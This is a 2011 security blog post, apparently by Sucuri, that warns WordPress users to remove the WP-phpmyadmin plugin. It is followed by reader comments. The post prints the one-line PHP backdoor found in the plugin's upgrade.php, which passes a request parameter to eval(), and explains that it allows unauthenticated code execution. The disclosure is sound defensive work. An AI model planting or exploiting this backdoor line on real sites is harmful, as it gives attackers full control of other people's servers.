WP-phpmyadmin WordPress plugin – Delete it now

June 22, 2011, by David Dede

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.

On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

This is not part of the plugin, and should be removed immediately!

The snippet above is a backdoor. Whenever a request carries an "asc" parameter (in the query string, the POST body or a cookie, since it reads $_REQUEST), the file passes that parameter's contents to eval() and runs it as PHP, with no authentication of any kind. Anyone who can reach upgrade.php over the web can therefore execute arbitrary code on the site.

We also noticed that it was removed from the WordPress plugin repository (originally here: wordpress.org/extend/plugins/wp-phpmyadmin/ ) and is no longer maintained (last update in 2007). Since it is no longer being updated, you shouldn't be using it anymore.

EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:

The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.

So the plugin was not pulled from the directory because of this backdoor. Given the recent compromises through it and the fact that it is no longer maintained, we nonetheless recommend deleting it as soon as possible.


If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.

If you are not sure if your site got hacked, you can scan it here: http://sitecheck.sucuri.net.

Categories: Vulnerability Disclosure, WordPress Security. Tags: Sucuri WordPress Plugin

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Guest

    June 23, 2011

    WP Greet Box was also removed recently (probably for security reasons).

  2. eric_cmi

    June 23, 2011

    What about the plugin Portable phpMyAdmin?

    • Otto

      June 24, 2011

      That plugin fixed the security problem: http://wordpress.org/extend/plugins/portable-phpmyadmin/changelog/

      • Andres Armeda

        June 24, 2011

        Hi Otto, are you referring to Portable phpMyAdmin?

        The link you posted is redirecting to the plugin directory home page.

        Thanks.

        • Ayush Gupta

          January 19, 2012

          Looks like plugin is back in action

    • Andres Armeda

      June 24, 2011

      We haven’t seen any security issues with that plugin Eric.

      The thing to consider is that you’re giving direct access in the WordPress dashboard to modify the database. This is a huge risk when you consider users that aren’t experienced with this type of interaction.

      If it needs to be used in a production environment, it is highly recommended that the proper access control be applied, and that processes be implemented around the use of the functionality.

      Hope this helps!

  3. Web marketer

    June 28, 2011

    Hi,

    Thanks for the info.

    I’ve had a nightmare over the last 24 hours as ALL my sites were compromised and malicious code injected into the index.php files.

    I’ve now removed the phpmyadmin plugin (which had the corrupted code in the update file as you say) and all seems to be ok for the moment. Fingers crossed it stays that way.

    My question is…

    Could the hacker access and inject malicious code on all my sites (all on the same shared hosting server) even if the plugin was only installed on one of the domains?

    I ask because I want to know if this is the only plugin causing me woe or whether there are more I need to act on.

    Thanks again
    D

  4. Ed

    July 12, 2011

    Hey guys,

    First off i completely agree that having a phpadmin plugin in the WP Dashboard is a huge risk on so many different levels.  😉  With that said, have you looked at or tested the WordPress Adminer plugin? The coding looks really solid and minus some base64 encoded images it looks really solid.  Thanks.

  5. David

    October 17, 2011

    Hi, I am very pleased with the plugin.. does exactly what i wanted. Thanks for share!

  6. Ayush Gupta

    January 19, 2012

    Now this plugin is removed from WordPress because it was having malicious code

  7. Jrfalcon5

    July 15, 2012

    my website was hacked after installing this and it said “hacked by nolov3” and my website was gone.

  8. Guest

    November 19, 2013

    Doesn’t seem to be such a reliable claim. phpMyAdmin is nowhere near low-quality malware, but instead a widely-used and quite nice tool. This article here seems to be indicating that the authors of that software deliberately wanted to do some backdoor things. This I highly doubt. http://www.phpmyadmin.net/home_page/security/ Hope more experienced people would provide some more knowledge on it.

  9. Timothy

    January 24, 2014

    Did you read the article? It is talking about WordPress plugin that packaged phpMyAdmin, and was insecure. They aren’t talking about the actual phpMyAdmin tool as being insecure, just the plugin.

  10. André Páscoa

    May 25, 2016

    Congratulations on the post. I was looking for an article like this.
